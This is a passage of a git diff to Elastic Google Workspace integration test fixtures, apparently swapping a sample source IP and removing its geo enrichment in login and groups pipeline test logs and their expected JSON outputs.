- "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2242,7 +1810,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2267,8 +1835,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:29.728275Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"reinvite_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:39:12.286168800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"reinvite_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}", "provider": "groups", "action": "reinvite_user", "id": "1", @@ -2302,31 +1870,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2341,7 +1891,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2366,8 +1916,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:29.728276400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"remove_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:39:12.286173Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"remove_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}", "provider": "groups", "action": "remove_user", "id": "1", diff --git a/packages/google_workspace/data_stream/login/_dev/test/pipeline/test-login.log b/packages/google_workspace/data_stream/login/_dev/test/pipeline/test-login.log index b721c74bf48..cc181596f84 100644 --- a/packages/google_workspace/data_stream/login/_dev/test/pipeline/test-login.log +++ b/packages/google_workspace/data_stream/login/_dev/test/pipeline/test-login.log @@ -1,14 +1,14 @@ -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"account_warning","name":"account_disabled_password_leak","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"account_warning","name":"suspicious_login","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"},{"name":"login_timestamp","intValue":1593695305123456}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"account_warning","name":"suspicious_login_less_secure_app","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"},{"name":"login_timestamp","intValue":1593695305123456}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"account_warning","name":"suspicious_programmatic_login","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"},{"name":"login_timestamp","intValue":1593695305123456}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"account_warning","name":"account_disabled_generic","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"account_warning","name":"account_disabled_spamming_through_relay","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"account_warning","name":"account_disabled_spamming","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"account_warning","name":"account_disabled_hijacked","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"},{"name":"login_timestamp","intValue":1593695305123456}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"account_warning","name":"gov_attack_warning"}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_failure","parameters":[{"name":"login_challenge_method","value":"backup_code"},{"name":"login_failure_type","value":"login_failure_access_code_disallowed"},{"name":"login_type","value":"exchange"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_challenge","parameters":[{"name":"login_challenge_method","value":"backup_code"},{"name":"login_challenge_status","value":"Challenge Passed."},{"name":"login_type","value":"exchange"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_verification","parameters":[{"name":"is_second_factor","boolValue":false},{"name":"login_challenge_method","value":"backup_code"},{"name":"login_challenge_status","value":"Challenge Passed."},{"name":"login_type","value":"exchange"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"logout","parameters":[{"name":"login_type","value":"exchange"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_success","parameters":[{"name":"login_challenge_method","value":"backup_code"},{"name":"is_suspicious","boolValue":false},{"name":"login_type","value":"exchange"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"account_warning","name":"account_disabled_password_leak","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"account_warning","name":"suspicious_login","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"},{"name":"login_timestamp","intValue":1593695305123456}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"account_warning","name":"suspicious_login_less_secure_app","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"},{"name":"login_timestamp","intValue":1593695305123456}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"account_warning","name":"suspicious_programmatic_login","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"},{"name":"login_timestamp","intValue":1593695305123456}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"account_warning","name":"account_disabled_generic","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"account_warning","name":"account_disabled_spamming_through_relay","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"account_warning","name":"account_disabled_spamming","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"account_warning","name":"account_disabled_hijacked","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"},{"name":"login_timestamp","intValue":1593695305123456}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"account_warning","name":"gov_attack_warning"}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"login","name":"login_failure","parameters":[{"name":"login_challenge_method","value":"backup_code"},{"name":"login_failure_type","value":"login_failure_access_code_disallowed"},{"name":"login_type","value":"exchange"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"login","name":"login_challenge","parameters":[{"name":"login_challenge_method","value":"backup_code"},{"name":"login_challenge_status","value":"Challenge Passed."},{"name":"login_type","value":"exchange"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"login","name":"login_verification","parameters":[{"name":"is_second_factor","boolValue":false},{"name":"login_challenge_method","value":"backup_code"},{"name":"login_challenge_status","value":"Challenge Passed."},{"name":"login_type","value":"exchange"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"login","name":"logout","parameters":[{"name":"login_type","value":"exchange"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"login","name":"login_success","parameters":[{"name":"login_challenge_method","value":"backup_code"},{"name":"is_suspicious","boolValue":false},{"name":"login_type","value":"exchange"}]}} diff --git a/packages/google_workspace/data_stream/login/_dev/test/pipeline/test-login.log-expected.json b/packages/google_workspace/data_stream/login/_dev/test/pipeline/test-login.log-expected.json index 0f042b5c60c..1260efd85eb 100644 --- a/packages/google_workspace/data_stream/login/_dev/test/pipeline/test-login.log-expected.json +++ b/packages/google_workspace/data_stream/login/_dev/test/pipeline/test-login.log-expected.json @@ -11,7 +11,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -33,35 +33,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:30.429403Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_password_leak\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"}]}}", + "ingested": "2021-12-09T13:39:16.340887200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_password_leak\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"}]}}", "provider": "login", "action": "account_disabled_password_leak", "id": "1", @@ -97,7 +79,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -120,35 +102,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:30.429408800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_login\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", + "ingested": "2021-12-09T13:39:16.340892600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_login\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", "provider": "login", "start": "2020-07-02T13:08:25.123Z", "action": "suspicious_login", @@ -184,7 +148,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -207,35 +171,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:30.429410700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_login_less_secure_app\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", + "ingested": "2021-12-09T13:39:16.340898900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_login_less_secure_app\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", "provider": "login", "start": "2020-07-02T13:08:25.123Z", "action": "suspicious_login_less_secure_app", @@ -271,7 +217,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -294,35 +240,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:30.429412300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_programmatic_login\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", + "ingested": "2021-12-09T13:39:16.340903900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_programmatic_login\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", "provider": "login", "start": "2020-07-02T13:08:25.123Z", "action": "suspicious_programmatic_login", @@ -358,7 +286,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -380,35 +308,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:30.429417200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_generic\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"}]}}", + "ingested": "2021-12-09T13:39:16.340907800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_generic\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"}]}}", "provider": "login", "action": "account_disabled_generic", "id": "1", @@ -444,7 +354,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -466,35 +376,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:30.429418700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_spamming_through_relay\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"}]}}", + "ingested": "2021-12-09T13:39:16.340912700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_spamming_through_relay\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"}]}}", "provider": "login", "action": "account_disabled_spamming_through_relay", "id": "1", @@ -530,7 +422,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -552,35 +444,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:30.429420200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_spamming\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"}]}}", + "ingested": "2021-12-09T13:39:16.340919200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_spamming\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"}]}}", "provider": "login", "action": "account_disabled_spamming", "id": "1", @@ -616,7 +490,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -639,35 +513,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:30.429421600Z", - "original": 